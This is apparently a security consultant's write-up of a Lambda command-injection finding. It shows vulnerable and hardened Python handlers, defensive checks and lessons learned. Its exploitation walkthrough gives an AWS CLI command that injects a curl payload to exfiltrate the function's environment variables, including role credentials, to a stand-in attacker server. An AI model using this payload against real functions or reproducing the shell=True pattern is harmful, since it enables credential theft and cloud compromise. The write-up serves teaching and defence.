This vulnerability maps directly to OWASP Top 10 A03:2021 - Injection and to MITRE ATT&CK T1059 (Command and Scripting Interpreter): the function itself is Python (T1059.006), while the injected payload runs in the Unix shell (T1059.004). The ability to modify Lambda environment variables, even if initially requiring a separate privilege escalation, is a common target for attackers because it offers a direct path to RCE.
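
The difference between the two invocation styles is easy to demonstrate with a harmless payload. The sketch below assumes a POSIX system with `/bin/sh` and an `echo` binary available; the helper names and the tainted string are illustrative stand-ins for the environment variable's value.

```python
import subprocess


def run_with_shell(command: str) -> str:
    """UNSAFE pattern: the whole string is interpreted by the shell."""
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout


def run_with_arg_list(program: str, *args: str) -> str:
    """Safer pattern: no shell; each argument reaches the program unchanged."""
    result = subprocess.run([program, *args], capture_output=True, text=True)
    return result.stdout


# Stand-in for a tampered environment variable: a legitimate-looking
# command followed by an attacker-controlled one.
tainted = "echo validating; echo INJECTED"

shell_output = run_with_shell(tainted)
list_output = run_with_arg_list("echo", "validating; echo INJECTED")
```

With `shell=True`, the semicolon splits the string into two commands and both run. With an argument list, the semicolon is just another character inside a single argument, so nothing extra executes.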

Here's a comparison of the vulnerable versus a hardened configuration approach:

Vulnerable Configuration

Environment Variable:

VALIDATION_SCRIPT_PATH="/usr/local/bin/validate_transaction.py --config /etc/app/config.json"

Lambda Code Snippet:

import subprocess
import os

def lambda_handler(event, context):
    script_command = os.environ.get("VALIDATION_SCRIPT_PATH", "/default/path/script.py")
    # DANGER: Using shell=True with unsanitized input from env var
    result = subprocess.run(script_command, shell=True, capture_output=True, text=True)
    print(result.stdout)
    if result.returncode != 0:
        print(f"Validation failed: {result.stderr}")
        raise Exception("Transaction validation error")
    return {"statusCode": 200, "body": "Transaction validated successfully"}

Hardened Configuration

Environment Variables:

VALIDATION_SCRIPT="/usr/local/bin/validate_transaction.py"
VALIDATION_CONFIG_PATH="/etc/app/config.json"

Lambda Code Snippet:

import subprocess
import os

def lambda_handler(event, context):
    script_path = os.environ.get("VALIDATION_SCRIPT", "/default/path/script.py")
    config_path = os.environ.get("VALIDATION_CONFIG_PATH", "/default/config.json")
    
    # SAFE: Pass command and arguments as a list, shell=False (default)
    # Ensure script_path and config_path are validated/sanitized if they can be user-controlled
    command_args = [script_path, "--config", config_path]
    result = subprocess.run(command_args, capture_output=True, text=True)
    print(result.stdout)
    if result.returncode != 0:
        print(f"Validation failed: {result.stderr}")
        raise Exception("Transaction validation error")
    return {"statusCode": 200, "body": "Transaction validated successfully"}

The key takeaway here is that any time you're dynamically constructing commands, whether from user input, configuration files, or environment variables, you must treat it as untrusted input and apply rigorous sanitization or, even better, use API calls that don't involve a shell, like passing arguments as a list to subprocess.run().
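If the script path really does need to come from configuration, one way to apply that "treat it as untrusted" rule is to check it against an allowlisted directory before executing it. The sketch below is an illustration under my own assumptions: the directory /opt/validators and the function name resolve_script are hypothetical and were not part of the engagement.

```python
import os

# Hypothetical allowlist directory; not taken from the engagement.
ALLOWED_SCRIPT_DIR = "/opt/validators"

def resolve_script(path: str, allowed_dir: str = ALLOWED_SCRIPT_DIR) -> str:
    """Return the canonical script path, or raise ValueError if it is not
    an existing file inside allowed_dir (after resolving '..' and symlinks)."""
    real_dir = os.path.realpath(allowed_dir)
    real_path = os.path.realpath(path)
    if os.path.commonpath([real_dir, real_path]) != real_dir:
        raise ValueError(f"script path not allowed: {path!r}")
    if not os.path.isfile(real_path):
        raise ValueError(f"script path is not a file: {path!r}")
    return real_path
```

This complements the list-form call rather than replacing it: the path check limits which program can run, and the list form keeps the shell out of the picture.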

Let's assume the vulnerable Python Lambda code looked something like this:

# transaction_processor.py
import os
import subprocess
import json

def lambda_handler(event, context):
    # Retrieve the command prefix from environment variables
    # This is the critical vulnerability point
    command_prefix = os.environ.get("VALIDATION_SCRIPT_PATH", "/usr/bin/python /opt/validation_logic.py")
    
    # Assume 'event' contains transaction data that needs validation
    transaction_data = json.loads(event['body'])
    transaction_id = transaction_data.get('transaction_id', 'UNKNOWN')

    # Construct the full command. The vulnerability is that command_prefix
    # is treated as part of the shell command, not just a path.
    full_command = f"{command_prefix} --transaction-id {transaction_id}"
    
    print(f"Executing validation command: {full_command}")
    
    try:
        # DANGER: shell=True allows command injection via command_prefix
        result = subprocess.run(full_command, shell=True, capture_output=True, text=True, check=True)
        print(f"Validation output: {result.stdout}")
        return {
            'statusCode': 200,
            'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
        }
    except subprocess.CalledProcessError as e:
        print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
        return {
            'statusCode': 500,
            'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
        }
    except Exception as e:
        print(f"An unexpected error occurred: {e}")
        return {
            'statusCode': 500,
            'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
        }

The default VALIDATION_SCRIPT_PATH was set to /usr/bin/python /opt/validation_logic.py. The developers intended for this to be a fixed script execution. However, because shell=True was used, any shell metacharacters in the command_prefix would be interpreted by the shell.
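One aside on the illustrative code above: transaction_id comes from the request body and is also interpolated into the shell string, so it would deserve the same suspicion as the environment variable. A minimal validation sketch follows, assuming IDs look like TXN12345; the exact format and the function name are my assumptions, not something confirmed by the client.

```python
import re

# Assumed ID format: starts alphanumeric, then letters, digits, '_' or '-'.
_TXN_ID = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,63}")

def validate_transaction_id(value: object) -> str:
    """Return value unchanged if it matches the assumed format, else raise."""
    if not isinstance(value, str) or not _TXN_ID.fullmatch(value):
        raise ValueError("invalid transaction_id")
    return value
```

Requiring an alphanumeric first character also rejects values such as --help, which could otherwise be read as an option by the validation script even when no shell is involved.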

💥 Exploitation Walkthrough

Our initial foothold wasn't directly on the Lambda function. We had identified a misconfigured CI/CD pipeline that, through a series of chained permissions, allowed us to assume an IAM role with lambda:UpdateFunctionConfiguration permissions for the TransactionProcessorLambda. This was our golden ticket. With these permissions, we could modify the Lambda's environment variables.

Our goal was to achieve RCE. We decided to demonstrate this by exfiltrating sensitive environment variables (which often contain AWS credentials for the Lambda's execution role) to an attacker-controlled server. First, we needed to modify the VALIDATION_SCRIPT_PATH environment variable. We used the AWS CLI for this, assuming we had the necessary IAM permissions:

# Step 1: Modify the Lambda's environment variable
# The payload injects a new command using shell metacharacters (;)
# It then uses curl to send the Lambda's environment variables to our listener.
# The original script still runs first, so validation output looks normal and
# avoids immediate suspicion, though the extra curl call adds latency and could cause a timeout.

ATTACKER_SERVER="http://your-attacker-ip:8000"
LAMBDA_NAME="TransactionProcessorLambda"

aws lambda update-function-configuration \
    --function-name ${LAMBDA_NAME} \
    --environment "Variables={VALIDATION_SCRIPT_PATH='/usr/bin/python /opt/validation_logic.py; curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '}"

Let's break down that payload for VALIDATION_SCRIPT_PATH:

'/usr/bin/python /opt/validation_logic.py; curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '

/usr/bin/python /opt/validation_logic.py: This is the original, legitimate part of the command.
;: This is the critical shell metacharacter. It separates the legitimate command from our injected command. The shell will execute the first command, then the second.
curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil: This is our injected command.
- curl -X POST: Initiates an HTTP POST request.
- -d "$(env)": The $(env) command substitution executes the env command (which lists all environment variables) and captures its output. This output is then sent as the data body of the POST request.
- ${ATTACKER_SERVER}/exfil: Our controlled server endpoint where we're listening for exfiltrated data.
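; echo 'Injection successful': Another command separator, followed by a simple echo. Because the shell reports the exit status of the last command in the chain, the invocation exits with status 0 even if the curl fails, so check=True does not raise. The echo also absorbs the --transaction-id argument that the Lambda appends to the command, and it leaves a small indicator in the Lambda logs if we were monitoring them. The final single quote closes the quoted value.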
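The separator and exit-status behaviour described in the breakdown can be reproduced locally with a benign stand-in. This sketch assumes a POSIX shell; the prefix value is made up and only runs false and echo.

```python
import subprocess

# Benign stand-in for the injected value: a failing command, then two echoes.
command_prefix = "false; echo second-command; echo marker"

# Same construction as the Lambda handler: it appends its own argument.
full_command = f"{command_prefix} --transaction-id TXN12345"

result = subprocess.run(full_command, shell=True, capture_output=True, text=True)

print(result.stdout)      # both echoes ran even though 'false' failed
print(result.returncode)  # exit status of the last command in the chain
```

The appended --transaction-id argument ends up as extra text printed by the final echo, which is why the handler sees a clean exit and never notices that its argument went to the wrong command.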

After updating the environment variable, we simply needed to trigger the Lambda function. Since it was exposed via API Gateway, a simple HTTP POST request to its endpoint was sufficient:

# Step 2: Trigger the Lambda function (e.g., via API Gateway)
# This would be a normal transaction request from a client application.

API_GATEWAY_URL="https://your-api-gateway-id.execute-api.us-east-1.amazonaws.com/prod/transactions"

curl -X POST -H "Content-Type: application/json" \
     -d '{"transaction_id": "TXN12345", "amount": 100.00, "currency": "USD"}' \
     "${API_GATEWAY_URL}"

On our attacker-controlled server (listening on port 8000), we immediately received an incoming POST request containing all of the Lambda's environment variables, including the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN for the Lambda's execution role. These temporary credentials granted us full programmatic access to whatever resources the Lambda's role had permissions for – which, in this case, was extensive, including DynamoDB, S3, and even some internal network access.

This was a critical RCE. With these credentials, we could have:

Read, modified, or deleted transaction data from DynamoDB.
Accessed sensitive audit logs from S3.
Pivoted to other AWS services or even internal networks if the role had appropriate permissions.
Deployed further malicious code or backdoors.

The impact was immediate and severe, demonstrating a complete compromise of the core payment processing function.
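Part of why the impact was so severe is that child processes inherit the parent's full environment by default, credentials included. One compensating control, offered here as my own suggestion rather than something the client had deployed, is to hand the validation subprocess a minimal environment. The allowlist of variable names below is an assumption for illustration.

```python
import os
import subprocess
import sys

# Variables the child is allowed to see; everything else is dropped.
# This allowlist is an assumption for illustration.
SAFE_ENV_KEYS = ("PATH", "LANG", "TZ")

def minimal_env(source=None) -> dict:
    """Build a child environment containing only allowlisted variables."""
    source = os.environ if source is None else source
    return {k: source[k] for k in SAFE_ENV_KEYS if k in source}

# Simulate a Lambda-like environment carrying role credentials.
parent_env = dict(os.environ, AWS_SECRET_ACCESS_KEY="example-secret")

child = subprocess.run(
    [sys.executable, "-c", "import os; print(sorted(os.environ))"],
    env=minimal_env(parent_env),
    capture_output=True,
    text=True,
)
print(child.stdout)  # variable names visible to the child process
```

This narrows what a child process sees by default, but it is not a substitute for fixing the injection itself: an attacker with code execution inside the function has other routes to the role's credentials.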

🛡 Defensive Hardening Blueprint

Remediating this vulnerability requires a multi-layered approach, focusing on secure coding practices, least privilege, and robust configuration management. The primary fix is to eliminate the use of shell=True with dynamically constructed commands and to separate command arguments from the command itself.

The trade-offs of this fix, as implemented in the hardened transaction_processor_hardened.py listing later in this write-up (which reads VALIDATION_SCRIPT and VALIDATION_ARGS and parses the latter with shlex), are as follows.

Pros

Eliminates Command Injection: By passing arguments as a list to subprocess.run() and avoiding shell=True, shell metacharacters are no longer interpreted.
Clear Separation of Concerns: Script path and arguments are distinct, reducing ambiguity.
Improved Security Posture: Significantly reduces the attack surface for RCE via environment variables.
Minimal Code Change: The core logic remains similar, making it easier to implement.
Standard Practice: Aligns with secure coding guidelines for executing external processes.

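Cons

Requires Code Modification: Not a configuration-only fix; the Lambda code itself needs updating.
Potential for Misconfiguration: If VALIDATION_SCRIPT or VALIDATION_ARGS is still poorly managed or contains malicious content, the script might receive unexpected arguments. Shell metacharacter injection is prevented, but an attacker who can set these variables can still choose which program and arguments run (for example, by pointing VALIDATION_SCRIPT at /bin/sh), so the values should also be checked against an allowlist.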
Increased Complexity for Dynamic Commands: If the original intent was to run highly dynamic, shell-dependent commands, this approach requires refactoring that logic into the application itself or using a safer command parser.
Dependency on shlex: While standard, it adds a small layer of parsing logic. For truly static arguments, a simple list is even safer.

Beyond this specific code fix, a comprehensive hardening blueprint would also include:

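Least Privilege IAM: Ensure the Lambda's execution role has only the absolute minimum permissions required. For instance, it shouldn't have lambda:UpdateFunctionConfiguration. The same applies to every other principal that can reach the function: in this engagement it was a role reachable from the CI/CD pipeline, not the execution role, that held that permission.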
Input Validation: Even if environment variables are "trusted," always validate and sanitize any data derived from them, especially if it influences command execution or file paths.
Static Application Security Testing (SAST): Integrate SAST tools into the CI/CD pipeline to automatically detect patterns like subprocess.run(..., shell=True) or dynamic command construction.
Runtime Application Self-Protection (RASP): Consider RASP solutions for critical functions to detect and block malicious command execution attempts at runtime.
Regular Security Audits: Periodically review Lambda configurations, environment variables, and IAM policies.
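For the periodic audit of environment variables, a simple heuristic can flag values that look like shell commands rather than plain configuration. The sketch below is a starting point under stated assumptions: it takes a dictionary shaped like the function configuration returned by the AWS SDK (an Environment key holding a Variables mapping), and the function name and reason strings are my own.

```python
import shlex

SHELL_OPERATORS = set(";|&<>()")

def suspicious_variables(function_config: dict) -> dict:
    """Map variable name -> reason for values that look like shell commands."""
    variables = function_config.get("Environment", {}).get("Variables", {})
    findings = {}
    for name, value in variables.items():
        if "$(" in value or "`" in value:
            findings[name] = "command substitution"
            continue
        # Tokenize roughly the way a POSIX shell would, keeping operators
        # such as ';' and '&&' as separate tokens.
        lexer = shlex.shlex(value, posix=True, punctuation_chars=True)
        lexer.whitespace_split = True
        lexer.commenters = ""  # do not let '#' hide the rest of the value
        try:
            tokens = list(lexer)
        except ValueError:
            findings[name] = "unbalanced quotes"
            continue
        if any(tok and set(tok) <= SHELL_OPERATORS for tok in tokens):
            findings[name] = "shell control operator"
    return findings
```

Expect false positives: an unquoted URL with a query string containing & will be flagged, for example. The point is to surface values for a human to review, not to block deployments automatically.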

📖 Lessons From the Field

Returning to the primary code fix from the hardening blueprint, here's how the Lambda code and environment variables should be configured:

# transaction_processor_hardened.py
import os
import subprocess
import json
import shlex # For safe splitting of shell-like strings

def lambda_handler(event, context):
    # Retrieve the script path and arguments separately
    # No longer a single 'command_prefix' that can be injected
    script_path = os.environ.get("VALIDATION_SCRIPT", "/usr/bin/python")
    script_args_str = os.environ.get("VALIDATION_ARGS", "/opt/validation_logic.py") # Default arguments

    # Assume 'event' contains transaction data that needs validation
    transaction_data = json.loads(event['body'])
    transaction_id = transaction_data.get('transaction_id', 'UNKNOWN')

    # Safely parse arguments using shlex.split() if they are expected to be shell-like
    # For truly fixed arguments, a simple list is better.
    # Here, we assume VALIDATION_ARGS might contain multiple arguments.
    try:
        script_args = shlex.split(script_args_str)
    except ValueError as e:
        print(f"Error parsing VALIDATION_ARGS: {e}. Using default.")
        script_args = ["/opt/validation_logic.py"] # Fallback to a safe default

    # Construct the full command as a list of arguments
    # This is crucial: subprocess.run with a list does NOT invoke a shell.
    command_list = [script_path] + script_args + ["--transaction-id", str(transaction_id)]
    
    print(f"Executing validation command: {' '.join(command_list)}")
    
    try:
        # SAFE: shell=False (default) when passing a list of arguments
        result = subprocess.run(command_list, capture_output=True, text=True, check=True)
        print(f"Validation output: {result.stdout}")
        return {
            'statusCode': 200,
            'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
        }
    except subprocess.CalledProcessError as e:
        print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
        return {
            'statusCode': 500,
            'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
        }
    except Exception as e:
        print(f"An unexpected error occurred: {e}")
        return {
            'statusCode': 500,
            'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
        }

And the corresponding environment variables:

# Hardened Environment Variables
VALIDATION_SCRIPT="/usr/bin/python"
VALIDATION_ARGS="/opt/validation_logic.py" # Arguments for the script

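This approach ensures that the script path and its arguments are treated as distinct elements, preventing shell metacharacter injection. It does not by itself stop an attacker who can still edit both variables from selecting a different executable or arguments, so the values should be restricted to known-good options. The shlex.split() function is used to safely parse the arguments string into a list, but even better is to provide arguments as separate environment variables if possible, or hardcode them if they are truly static.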
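Taking the "hardcode them" option one step further, the environment variable can select a named profile while the actual command lines live in code. This is a sketch of that idea, not the client's implementation: VALIDATION_PROFILE, the profile names, and the --strict flag are all hypothetical.

```python
import os

# Hypothetical validator profiles mapped to fixed argument vectors.
VALIDATORS = {
    "standard": ["/usr/bin/python", "/opt/validation_logic.py"],
    "strict": ["/usr/bin/python", "/opt/validation_logic.py", "--strict"],
}

def build_command(transaction_id: str, environ=os.environ) -> list[str]:
    """Look up the configured validator by name and append the transaction ID."""
    name = environ.get("VALIDATION_PROFILE", "standard")
    if name not in VALIDATORS:
        raise ValueError(f"unknown validation profile: {name!r}")
    return [*VALIDATORS[name], "--transaction-id", transaction_id]
```

Operations teams can still switch validation behaviour without a redeploy, but the worst an attacker can do by editing the variable is pick another entry from the list or trigger an error.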

This incident, like many others I've encountered over the years, hammered home some critical lessons that often get overlooked in the rush of development:

Environment Variables Are Not Inherently Safe: Trust me, my friends, this is a common misconception. Developers often treat environment variables as a secure, static configuration. But if an attacker gains the ability to modify them (which is a common privilege escalation target), they become a potent vector for injection, RCE, or data exfiltration. Always treat them as potentially untrusted input, especially if they influence command execution.
shell=True is a Red Flag: Any time you see shell=True in Python's subprocess module (or similar constructs in other languages), your security alarms should be blaring. It's almost always a shortcut that introduces significant risk. It means you're handing control to the underlying shell, which will happily interpret any metacharacters an attacker might inject. Prefer passing commands as a list of arguments.
The Chain is Only as Strong as its Weakest Link: Our RCE wasn't a direct hit on the Lambda. It was a chain: a misconfigured CI/CD pipeline led to IAM privilege escalation, which then allowed us to modify the Lambda's environment. Security isn't just about individual components; it's about the entire ecosystem and how they interact. A seemingly minor misconfiguration in one place can unlock critical vulnerabilities elsewhere.
Security by Design, Not by Afterthought: This vulnerability could have been avoided if the design principle of "never trust input" (even configuration input) was applied from the outset. Building security in from the ground up, rather than trying to bolt it on later, is always more effective and less costly. This includes threat modeling, secure code reviews, and automated security testing throughout the development lifecycle.
Assume Compromise: Even with the best defenses, assume an attacker might eventually gain some level of access. This mindset drives you to implement compensating controls like least privilege IAM roles, network segmentation, and robust logging/monitoring, so that even if one component is compromised, the blast radius is minimized and the attack is detected quickly.

This was a critical finding, but it was also a fantastic learning opportunity for the client. It reinforced the importance of looking beyond the obvious attack vectors and understanding the subtle ways configuration choices can lead to catastrophic outcomes. If you're grappling with similar challenges in your cloud environments or want to dive deeper into these kinds of real-world attack scenarios, don't hesitate to reach out. I offer personalized security mentorship sessions and consulting. You can book a 1-on-1 with me, Debasis Bhattacharjee, at thedevdude.com or learnwithdeb.com. Let's secure the digital frontier together.

ID: RTL-2026-001 · Cloud Security · Severity: CRITICAL · 2026-03-13
